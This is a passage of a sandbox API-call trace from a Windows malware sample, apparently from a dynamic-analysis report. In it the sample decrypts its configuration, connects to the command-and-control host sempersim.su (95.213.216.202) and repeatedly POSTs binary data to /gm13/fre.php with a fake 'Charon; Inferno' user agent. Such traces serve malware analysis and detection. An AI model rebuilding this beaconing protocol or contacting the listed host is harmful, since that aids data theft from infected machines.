RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6434d0 [0189.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.269] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0189.283] GetProcessHeap () returned 0x620000 [0189.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0189.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.284] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0189.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.285] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.286] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.286] GetProcessHeap () returned 0x620000 [0189.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0189.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.287] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6434d0, pdwDataLen=0x19fcfc | out: pbData=0x6434d0, pdwDataLen=0x19fcfc) returned 1 [0189.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.288] CryptDestroyKey (hKey=0x62d710) returned 1 [0189.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.289] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0189.289] GetProcessHeap () returned 0x620000 [0189.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0189.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.290] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0189.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.291] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0189.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.296] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0189.296] GetProcessHeap () returned 0x620000 [0189.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0189.296] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0189.298] GetProcessHeap () returned 0x620000 [0189.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0189.298] socket (af=2, type=1, protocol=6) returned 0x34c [0189.299] connect (s=0x34c, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0189.352] FreeAddrInfoW (pAddrInfo=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0189.352] GetProcessHeap () returned 0x620000 [0189.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0189.353] GetProcessHeap () returned 0x620000 [0189.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0189.354] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0189.355] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0189.355] GetProcessHeap () returned 0x620000 [0189.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0189.355] GetProcessHeap () returned 0x620000 [0189.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0189.356] GetProcessHeap () returned 0x620000 [0189.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643518 [0189.356] GetProcessHeap () returned 0x620000 [0189.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0189.357] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0189.357] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0189.358] GetProcessHeap () returned 0x620000 [0189.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0189.358] GetProcessHeap () returned 0x620000 [0189.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0189.358] send (s=0x34c, buf=0x63a880*, len=237, flags=0) returned 237 [0189.359] send (s=0x34c, buf=0x6421e0*, len=159, flags=0) returned 159 [0189.359] GetProcessHeap () returned 0x620000 [0189.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0189.359] recv (in: s=0x34c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0190.975] GetProcessHeap () returned 0x620000 [0190.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0190.976] GetProcessHeap () returned 0x620000 [0190.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643518 | out: hHeap=0x620000) returned 1 [0190.976] GetProcessHeap () returned 0x620000 [0190.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0190.977] GetProcessHeap () returned 0x620000 [0190.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0190.977] closesocket (s=0x34c) returned 0 [0190.978] GetProcessHeap () returned 0x620000 [0190.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0190.978] GetProcessHeap () returned 0x620000 [0190.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0190.978] GetProcessHeap () returned 0x620000 [0190.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0190.978] GetProcessHeap () returned 0x620000 [0190.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0190.992] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xba4) returned 0x34c [0190.997] Sleep (dwMilliseconds=0xea60) [0191.015] GetProcessHeap () returned 0x620000 [0191.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0191.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.017] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.056] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0191.069] GetProcessHeap () returned 0x620000 [0191.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0191.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.070] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0191.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.070] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.071] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.071] GetProcessHeap () returned 0x620000 [0191.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0191.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.121] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0191.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.126] CryptDestroyKey (hKey=0x62d710) returned 1 [0191.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.128] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0191.128] GetProcessHeap () returned 0x620000 [0191.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0191.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.129] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.130] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.131] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.131] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.132] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.132] GetProcessHeap () returned 0x620000 [0191.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0191.132] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.133] GetProcessHeap () returned 0x620000 [0191.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0191.133] GetProcessHeap () returned 0x620000 [0191.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0191.133] GetProcessHeap () returned 0x620000 [0191.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0191.134] GetProcessHeap () returned 0x620000 [0191.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6431b8 [0191.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.227] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.235] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0191.328] GetProcessHeap () returned 0x620000 [0191.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0191.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.329] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0191.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.330] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.331] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.331] GetProcessHeap () returned 0x620000 [0191.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0191.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.332] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6431b8, pdwDataLen=0x19fcfc | out: pbData=0x6431b8, pdwDataLen=0x19fcfc) returned 1 [0191.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.333] CryptDestroyKey (hKey=0x62d210) returned 1 [0191.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0191.333] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0191.333] GetProcessHeap () returned 0x620000 [0191.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0191.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.334] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0191.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.335] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0191.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0191.336] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0191.336] GetProcessHeap () returned 0x620000 [0191.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0191.336] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c690*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0191.341] GetProcessHeap () returned 0x620000 [0191.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b630 [0191.341] socket (af=2, type=1, protocol=6) returned 0x350 [0191.341] connect (s=0x350, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0191.403] FreeAddrInfoW (pAddrInfo=0x63c690*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0191.403] GetProcessHeap () returned 0x620000 [0191.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0191.403] GetProcessHeap () returned 0x620000 [0191.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0191.403] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0191.404] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0191.404] GetProcessHeap () returned 0x620000 [0191.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0191.404] GetProcessHeap () returned 0x620000 [0191.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0191.405] GetProcessHeap () returned 0x620000 [0191.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0191.405] GetProcessHeap () returned 0x620000 [0191.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0191.405] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0191.406] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0191.406] GetProcessHeap () returned 0x620000 [0191.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0191.406] GetProcessHeap () returned 0x620000 [0191.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0191.407] send (s=0x350, buf=0x63a880*, len=237, flags=0) returned 237 [0191.407] send (s=0x350, buf=0x6421e0*, len=159, flags=0) returned 159 [0191.408] GetProcessHeap () returned 0x620000 [0191.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0191.408] recv (in: s=0x350, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0193.181] GetProcessHeap () returned 0x620000 [0193.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0193.181] GetProcessHeap () returned 0x620000 [0193.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0193.182] GetProcessHeap () returned 0x620000 [0193.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0193.183] GetProcessHeap () returned 0x620000 [0193.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0193.183] closesocket (s=0x350) returned 0 [0193.185] GetProcessHeap () returned 0x620000 [0193.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b630 | out: hHeap=0x620000) returned 1 [0193.185] GetProcessHeap () returned 0x620000 [0193.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0193.186] GetProcessHeap () returned 0x620000 [0193.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6431b8 | out: hHeap=0x620000) returned 1 [0193.186] GetProcessHeap () returned 0x620000 [0193.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0193.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x488) returned 0x350 [0193.202] Sleep (dwMilliseconds=0xea60) [0193.228] GetProcessHeap () returned 0x620000 [0193.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435a8 [0193.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.230] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.247] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0193.256] GetProcessHeap () returned 0x620000 [0193.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0193.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.257] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0193.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.258] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.259] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.259] GetProcessHeap () returned 0x620000 [0193.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0193.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.260] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435a8, pdwDataLen=0x19fcfc | out: pbData=0x6435a8, pdwDataLen=0x19fcfc) returned 1 [0193.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.267] CryptDestroyKey (hKey=0x62d190) returned 1 [0193.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.268] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0193.268] GetProcessHeap () returned 0x620000 [0193.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645858 [0193.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.269] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.270] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.271] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0193.271] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.271] GetProcessHeap () returned 0x620000 [0193.271] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0193.271] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.272] GetProcessHeap () returned 0x620000 [0193.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0193.272] GetProcessHeap () returned 0x620000 [0193.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645858 | out: hHeap=0x620000) returned 1 [0193.272] GetProcessHeap () returned 0x620000 [0193.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0193.273] GetProcessHeap () returned 0x620000 [0193.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0193.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.280] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0193.285] GetProcessHeap () returned 0x620000 [0193.285] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0193.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.286] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0193.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.287] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.288] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.288] GetProcessHeap () returned 0x620000 [0193.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0193.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0193.289] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, 